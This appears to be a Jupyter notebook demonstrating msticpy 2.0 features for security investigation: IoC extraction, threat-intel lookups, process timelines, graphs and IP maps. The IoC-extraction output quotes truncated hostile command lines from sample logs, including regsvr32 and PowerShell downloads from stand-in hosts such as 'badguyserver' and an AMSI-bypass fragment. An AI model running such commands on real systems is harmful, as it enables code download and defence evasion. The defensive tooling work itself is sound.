New "house style" - shortening msticpy to "mp"
import msticpy as mp
mp.init_notebook()
True
Many classes and functions are available directly from "mp"
qry_prov = mp.QueryProvider("MSSentinel")
ti = mp.TILookup()
mp.check_version()
mp.search("sentinel")
Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank msticpy version installed: 2.0.0rc2 latest published: 1.8.2 Latest version is installed.
Module | Help |
---|---|
msticpy.datamodel.soc.sentinel_alert | msticpy.datamodel.soc.sentinel_alert |
msticpy.context.azure.sentinel_utils | msticpy.context.azure.sentinel_utils |
msticpy.config.ce_azure_sentinel | msticpy.config.ce_azure_sentinel |
msticpy.context.azure.sentinel_incidents | msticpy.context.azure.sentinel_incidents |
msticpy.context.azure.sentinel_watchlists | msticpy.context.azure.sentinel_watchlists |
msticpy.context.azure.sentinel_core | msticpy.context.azure.sentinel_core |
msticpy.context.azure.sentinel_bookmarks | msticpy.context.azure.sentinel_bookmarks |
msticpy.context.azure.sentinel_workspaces | msticpy.context.azure.sentinel_workspaces |
msticpy.context.azure.sentinel_analytics | msticpy.context.azure.sentinel_analytics |
msticpy.context.azure.sentinel_search | msticpy.context.azure.sentinel_search |
init_notebook
imports many items into the notebook namespace:
ip = "145.1.10.17"
IpAddress.whois(ip)
asn | asn_cidr | asn_country_code | asn_date | asn_description | asn_registry | nets | nir | query | raw | raw_referral | referral | |
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 1103 | 145.1.0.0/17 | NL | 1993-09-01 | SURFNET-NL SURFnet, The Netherlands, NL | ripencc | [{'cidr': '145.1.0.0/17', 'name': 'NIOZ-NET', 'handle': 'WP1948-RIPE', 'range': '145.1.0.0 - 145... | None | 145.1.10.17 | None | None | None |
IpAddress.util.geoloc(ip)
CountryCode | CountryName | Longitude | Latitude | TimeGenerated | Type | IpAddress | |
---|---|---|---|---|---|---|---|
0 | NL | Netherlands | 4.8995 | 52.3824 | 2022-06-14 16:25:09.670081 | geolocation | 145.1.10.17 |
Most dataframe-related functionality available through:
df.mp_timeseries
- is a separate item since it requires non-core dependencies such as statsmodel
proc_df = pd.read_csv("data/processes_on_host.csv", index_col=0)
proc_df.head(3)
TenantId | Account | EventID | TimeGenerated | Computer | SubjectUserSid | SubjectUserName | SubjectDomainName | SubjectLogonId | NewProcessId | NewProcessName | TokenElevationType | ProcessId | CommandLine | ParentProcessName | TargetLogonId | SourceComputerId | TimeCreatedUtc | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 802d39e1-9d70-404d-832c-2de5e2478eda | WORKGROUP\MSTICAlertsWin1$ | 4688 | 2019-01-15 05:24:24.010 | MSTICAlertsWin1 | S-1-5-18 | MSTICAlertsWin1$ | WORKGROUP | 0x3e7 | 0x1610 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | %%1936 | 0x888 | "C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\D... | C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:24:24.010 |
1 | 802d39e1-9d70-404d-832c-2de5e2478eda | WORKGROUP\MSTICAlertsWin1$ | 4688 | 2019-01-15 05:24:24.023 | MSTICAlertsWin1 | S-1-5-18 | MSTICAlertsWin1$ | WORKGROUP | 0x3e7 | 0x1790 | C:\Windows\System32\conhost.exe | %%1936 | 0x1610 | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\De... | 0x0 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:24:24.023 |
2 | 802d39e1-9d70-404d-832c-2de5e2478eda | WORKGROUP\MSTICAlertsWin1$ | 4688 | 2019-01-15 05:24:25.807 | MSTICAlertsWin1 | S-1-5-18 | MSTICAlertsWin1$ | WORKGROUP | 0x3e7 | 0xcd8 | C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | %%1936 | 0x280 | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding | C:\Windows\System32\svchost.exe | 0x3e4 | 46fe7078-61bb-4bed-9430-7ac01d91c273 | 2019-01-15 05:24:25.807 |
proc_df.mp.ioc_extract(columns="CommandLine", ioc_types=["ipv4", "url"])
IoCType | Observable | SourceIndex | Input | |
---|---|---|---|---|
0 | url | http://server/file.sct | 94 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
1 | dns | server | 94 | .\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll |
2 | url | https://blah/png','google.png')} | 104 | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... |
3 | dns | blah | 104 | .\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... |
4 | url | http://somedomain/best-kitten-names-1.jpg' | 110 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
5 | dns | somedomain | 110 | cmd /c ".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... |
6 | url | http://badguyserver/pwnme | 125 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
7 | dns | badguyserver | 125 | cmd /c "echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme" |
8 | url | http://badguyserver/pwnme | 130 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
9 | dns | badguyserver | 130 | .\powershell -Noninteractive -Noprofile -Command "Invoke-Expression Get-Process; Invoke-WebRequ... |
10 | url | http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | 174 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
11 | dns | system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | 174 | .\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... |
12 | ipv4 | 1.2.3.4 | 175 | netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\b... |
13 | ipv4 | 127.0.0.1 | 214 | certutil -urlcache -split -f http://127.0.0.1/ |
14 | url | http://127.0.0.1/ | 214 | certutil -urlcache -split -f http://127.0.0.1/ |
help(proc_df.mp_plot.timeline)
Help on method timeline in module msticpy.vis.mp_pandas_plot: timeline(**kwargs) -> bokeh.models.layouts.LayoutDOM method of msticpy.vis.mp_pandas_plot.MsticpyPlotAccessor instance Display a timeline of events. Parameters ---------- time_column : str, optional Name of the timestamp column (the default is 'TimeGenerated') source_columns : list, optional List of default source columns to use in tooltips (the default is None) Other Parameters ---------------- title : str, optional Title to display (the default is None) alert : SecurityAlert, optional Add a reference line/label using the alert time (the default is None) ref_event : Any, optional Add a reference line/label using the alert time (the default is None) ref_time : datetime, optional Add a reference line/label using `ref_time` (the default is None) group_by : str The column to group timelines on. legend: str, optional "left", "right", "inline" or "none" (the default is to show a legend when plotting multiple series and not to show one when plotting a single series) yaxis : bool, optional Whether to show the yaxis and labels (default is False) ygrid : bool, optional Whether to show the yaxis grid (default is False) xgrid : bool, optional Whether to show the xaxis grid (default is True) range_tool : bool, optional Show the the range slider tool (default is True) height : int, optional The height of the plot figure (the default is auto-calculated height) width : int, optional The width of the plot figure (the default is 900) color : str Default series color (default is "navy") overlay_data : pd.DataFrame: A second dataframe to plot as a different series. overlay_color : str Overlay series color (default is "green") ref_events : pd.DataFrame, optional Add references line/label using the event times in the dataframe. (the default is None) ref_time_col : str, optional Add references line/label using the this column in `ref_events` for the time value (x-axis). (this defaults the value of the `time_column` parameter or 'TimeGenerated' `time_column` is None) ref_col : str, optional The column name to use for the label from `ref_events` (the default is None) ref_times : List[Tuple[datetime, str]], optional Add one or more reference line/label using (the default is None) Returns ------- LayoutDOM The bokeh plot figure.
proc_df.mp_plot.timeline(group_by="SubjectUserName", source_columns=["CommandLine"])
proc_df.mp_plot.process_tree(legend_col="SubjectUserName")
Previously - minimal code
from msticpy.nbtools.timeseries import display_timeseries_anomolies
from msticpy.analysis.timeseries import timeseries_anomalies_stl
ts_data = pd.read_csv("data/TimeSeriesDemo.csv", parse_dates=["TimeGenerated"])
ts_data = ts_data[["TimeGenerated", "TotalBytesSent"]]
ts_data = ts_data.set_index("TimeGenerated")
ts_df = timeseries_anomalies_stl(ts_data)
display_timeseries_anomolies(ts_df)
from msticpy.analysis import timeseries
ts_data = pd.read_csv("data/TimeSeriesDemo.csv", parse_dates=["TimeGenerated"])
ts_data.mp_timeseries.analyze(
time_column="TimeGenerated", data_column="TotalBytesSent"
).mp_timeseries.plot(y="TotalBytesSent")
Previously, when using multiple providers, indicators were sent to each provider in sequence. Large number of indicators caused notebook to appear to have hung.
V 2.0:
iocs = ['162.244.80.235', '185.141.63.120', '82.118.21.1', '85.93.88.165']
ti_lookup = mp.TILookup()
ti_lookup.lookup_iocs(iocs)
Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank
Observables processed: 100%|██████████| 24/24 [00:11<00:00, 2.10obs/s]
Ioc | IocType | SanitizedValue | QuerySubtype | Provider | Result | Severity | Details | RawResult | Reference | Status | |
---|---|---|---|---|---|---|---|---|---|---|---|
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | OTX | True | high | {'pulse_count': 45, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | {'whois': 'http://whois.domaintools.com/162.244.80.235', 'reputation': 0, 'indicator': '162.244.... | https://otx.alienvault.com/api/v1/indicators/IPv4/162.244.80.235/general | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | OTX | True | high | {'pulse_count': 35, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | {'whois': 'http://whois.domaintools.com/185.141.63.120', 'reputation': 0, 'indicator': '185.141.... | https://otx.alienvault.com/api/v1/indicators/IPv4/185.141.63.120/general | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | OTX | True | high | {'pulse_count': 36, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | {'whois': 'http://whois.domaintools.com/82.118.21.1', 'reputation': 0, 'indicator': '82.118.21.1... | https://otx.alienvault.com/api/v1/indicators/IPv4/82.118.21.1/general | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | OTX | True | high | {'pulse_count': 22, 'names': ['MS-ISAC: Joint Cybersecurity Advisory: Conti Ransomware', 'Conti ... | {'whois': 'http://whois.domaintools.com/85.93.88.165', 'reputation': 0, 'indicator': '85.93.88.1... | https://otx.alienvault.com/api/v1/indicators/IPv4/85.93.88.165/general | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | RiskIQ | True | high | {'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | {'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | https://community.riskiq.com | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | RiskIQ | True | high | {'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | {'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | https://community.riskiq.com | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | RiskIQ | True | high | {'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | {'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | https://community.riskiq.com | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | RiskIQ | True | high | {'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | {'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | https://community.riskiq.com | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | Tor | True | information | Not found. | None | https://check.torproject.org/exit-addresses | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 35, 'detected_urls': [... | {'asn': 19624, 'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-03 16:53... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 19, 'detected_urls': [... | {'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-05 03:45:47', 'positiv... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 42, 'detected_urls': [... | {'asn': 204957, 'undetected_urls': [['http://bkgs0007.nov.com/', 'fe9ad6fcfd8214a3898853b5dec208... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | VirusTotal | True | high | {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 7, 'detected_urls': ['... | {'asn': 8972, 'undetected_urls': [['https://bbb.edu-cisco.org/', '6adc598e2c5362b5f5facad921d0f0... | https://www.virustotal.com/vtapi/v2/ip-address/report | 0 |
0 | 162.244.80.235 | ipv4 | 162.244.80.235 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/162.244.80.235 | 401 |
1 | 185.141.63.120 | ipv4 | 185.141.63.120 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/185.141.63.120 | 401 |
2 | 82.118.21.1 | ipv4 | 82.118.21.1 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/82.118.21.1 | 401 |
3 | 85.93.88.165 | ipv4 | 85.93.88.165 | None | XForce | False | information | Authorization failed. Check account and key details. | <Response [401 Unauthorized]> | https://api.xforce.ibmcloud.com/ipr/85.93.88.165 | 401 |
New in V2.0 - builds on previous Alert and Incident graph modules but in generic form
proc_df.mp.to_graph
nxg = proc_df.mp.to_graph(
source_col="SubjectUserName",
target_col="NewProcessName",
source_attrs=["SubjectDomainName", "SubjectLogonId"],
target_attrs=["CommandLine", "ParentProcessName"],
edge_attrs=["TimeGenerated"]
)
import networkx as nx
nx.draw(nxg)
proc_df.mp_plot.network(
source_col="SubjectUserName",
target_col="NewProcessName",
source_attrs=["SubjectDomainName", "SubjectLogonId"],
target_attrs=["CommandLine", "ParentProcessName"],
edge_attrs=["TimeGenerated"],
font_size=7,
)
Previous code
# Create a IP Geolookup class
iplocation = GeoLiteLookup()
def format_ip_entity(row, ip_col):
ip_entity = entities.IpAddress(Address=row[ip_col])
iplocation.lookup_ip(ip_entity=ip_entity)
ip_entity.AdditionalData["protocol"] = row.L7Protocol
if "severity" in row:
ip_entity.AdditionalData["threat severity"] = row["severity"]
if "Details" in row:
ip_entity.AdditionalData["threat details"] = row["Details"]
return ip_entity
ips_out = list(selected_out.apply(lambda x: format_ip_entity(x, "dest"), axis=1))
ips_in = list(selected_in.apply(lambda x: format_ip_entity(x, "source"), axis=1))
ips_threats = list(ti_ip_results.apply(lambda x: format_ip_entity(x, "Ioc"), axis=1))
icon_props = {"color": "green"}
for ips in host_entity.public_ips:
ips.AdditionalData["host"] = host_entity.HostName
folium_map.add_ip_cluster(ip_entities=host_entity.public_ips, **icon_props)
icon_props = {"color": "blue"}
folium_map.add_ip_cluster(ip_entities=ips_out, **icon_props)
icon_props = {"color": "purple"}
folium_map.add_ip_cluster(ip_entities=ips_in, **icon_props)
icon_props = {"color": "red"}
folium_map.add_ip_cluster(ip_entities=ips_threats, **icon_props)
display(folium_map)
# read in a DataFrame from a csv file
geo_loc_df = (
pd
.read_csv("data/ip_locs.csv", index_col=0)
.dropna(subset=["Latitude", "Longitude", "IpAddress"]) # We need to remove an NaN values
)
display(geo_loc_df.head(5))
AllExtIPs | CountryCode | CountryName | State | City | Longitude | Latitude | Asn | edges | Type | AdditionalData | IpAddress | |
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 65.55.44.109 | US | United States | Virginia | Boydton | -78.3750 | 36.6534 | NaN | set() | geolocation | {} | 65.55.44.109 |
1 | 13.71.172.128 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.128 |
2 | 13.71.172.130 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.130 |
3 | 40.124.45.19 | US | United States | Texas | San Antonio | -98.4926 | 29.4221 | NaN | set() | geolocation | {} | 40.124.45.19 |
4 | 104.43.212.12 | US | United States | Iowa | Des Moines | -93.6127 | 41.6015 | NaN | set() | geolocation | {} | 104.43.212.12 |
geo_loc_df.mp_plot.folium_map(ip_column="IpAddress")
geo_loc_df.mp_plot.folium_map(
lat_column="Latitude", long_column="Longitude", zoom_start=10
)
# Create some data to display
data_df = pd.DataFrame({
"Status": ["Home", "Office", "Vacation"] * (len(geo_loc_df) // 3),
"Friendliness": ["Warm", "Cold", "Medium"] * (len(geo_loc_df) // 3),
"Flavor": ["Chocolate", "Cinnamon", "Mango"] * (len(geo_loc_df) // 3),
"SpiceLevel": [1, 2, 3] * (len(geo_loc_df) // 3)
})
geo_loc_data_df = pd.concat([geo_loc_df, data_df], axis=1).dropna(subset=["IpAddress"])
geo_loc_data_df.head(3)
AllExtIPs | CountryCode | CountryName | State | City | Longitude | Latitude | Asn | edges | Type | AdditionalData | IpAddress | Status | Friendliness | Flavor | SpiceLevel | |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | 65.55.44.109 | US | United States | Virginia | Boydton | -78.3750 | 36.6534 | NaN | set() | geolocation | {} | 65.55.44.109 | Home | Warm | Chocolate | 1.0 |
1 | 13.71.172.128 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.128 | Office | Cold | Cinnamon | 2.0 |
2 | 13.71.172.130 | CA | Canada | Ontario | Toronto | -79.4195 | 43.6644 | NaN | set() | geolocation | {} | 13.71.172.130 | Vacation | Medium | Mango | 3.0 |
geo_loc_data_df.mp_plot.folium_map(
ip_column="IpAddress",
layer_column="CountryName",
tooltip_columns=["Status", "Flavor"],
popup_columns=["Friendliness", "SpiceLevel", "Status", "Flavor"],
zoom_start=2,
)
icon_map = {
"US": {
"color": "green",
"icon": "flash",
},
"GB": {
"color": "purple",
"icon": "flash",
},
"default": {
"color": "blue",
"icon": "info-sign",
},
}
geo_loc_df.mp_plot.folium_map(
ip_column="AllExtIPs",
icon_column="CountryCode",
icon_map=icon_map,
zoom_start=2,
)
mp.MpConfigEdit()
Label(value='Loading. Please wait.')
VBox(children=(Tab(children=(VBox(children=(Label(value='Microsoft Sentinel workspace settings'), HBox(childre…
mp.pivot.browse()
VBox(children=(HBox(children=(VBox(children=(HTML(value='<b>Entities</b>'), Select(description='entity', layou…
qry_prov = mp.QueryProvider("MSSentinel")
qry_prov2 = mp.QueryProvider("MSSentinel")
qry_prov.connect(workspace="Default")
mp.pivot.browse()
qry_prov.connect(workspace="CyberSecuritySOC")
mp.pivot.browse()
qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.wevt_logons()
qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.wevt_logons()
# with UseQueryFamily: True
qry_prov.WindowsSecurity.list_host_logons() -> Host.MSSentinel.WindowsSecurity_logons()
mp.pivot.timespan
....
Pivots:
UseV1QueryNames: False
UseQueryFamily: False
UseQueryProviderTimeSpans: False
folder | description | previously |
---|---|---|
analysis | Data analysis functions - timeseries, anomalies, clustering | analysis |
auth | authentication and secrets management | common |
common | common used utilities and definitions (e.g. exceptions) | - |
config | configuration and settings | - |
context | enrichment modules some modules may need subfolders - e.g. tiproviders, vtlookup | sectools |
data | data acquisition/queries (most Azure/Sentinel funcs moved to context) | - |
datamodel | entities, soc, pivot core functions | - |
init | package loading and initialization - nbinit, pivot creation modules | nbtools, datamodel |
transform | simple data processing - decoding, reformatting, schema change, process tree | sectools |
vis | visualization modules including browsers | nbtools |
nbwidgets | nb widgets modules | nbtools/nbwidgets |
sectools
and nbtools
still exist but are mostly redirector modules.
E.g.
from msticpy.sectools.geoip import GeoLiteLookup
still works but has a deprecation warning.